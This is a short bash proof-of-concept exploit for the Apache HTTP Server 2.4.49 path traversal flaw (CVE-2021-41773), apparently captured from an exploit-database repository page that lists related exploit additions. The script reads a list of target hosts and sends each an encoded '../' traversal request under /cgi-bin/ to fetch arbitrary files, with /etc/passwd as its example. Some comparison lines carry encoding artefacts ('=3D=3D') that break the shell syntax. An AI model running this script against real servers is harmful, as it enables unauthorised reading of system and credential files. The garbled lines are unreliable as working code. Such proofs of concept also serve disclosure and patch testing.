
4 changes to exploits/shellcodes Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure Apache HTTP Server 2.4.49 - Path Traversal
18 lines
No EOL
575 B
Bash
Executable file
18 lines
No EOL
575 B
Bash
Executable file
# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal
|
|
# Date: 10/05/2021
|
|
# Exploit Author: Lucas Souza https://lsass.io
|
|
# Vendor Homepage: https://apache.org/
|
|
# Version: 2.4.49
|
|
# Tested on: 2.4.49
|
|
# CVE : CVE-2021-41773
|
|
# Credits: Ash Daulton and the cPanel Security Team
|
|
|
|
#!/bin/bash
|
|
|
|
if [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then
|
|
echo Set [TAGET-LIST.TXT] [PATH]
|
|
echo ./PoC.sh targets.txt /etc/passwd
|
|
exit
|
|
fi
|
|
for host in $(cat $1); do
|
|
curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done |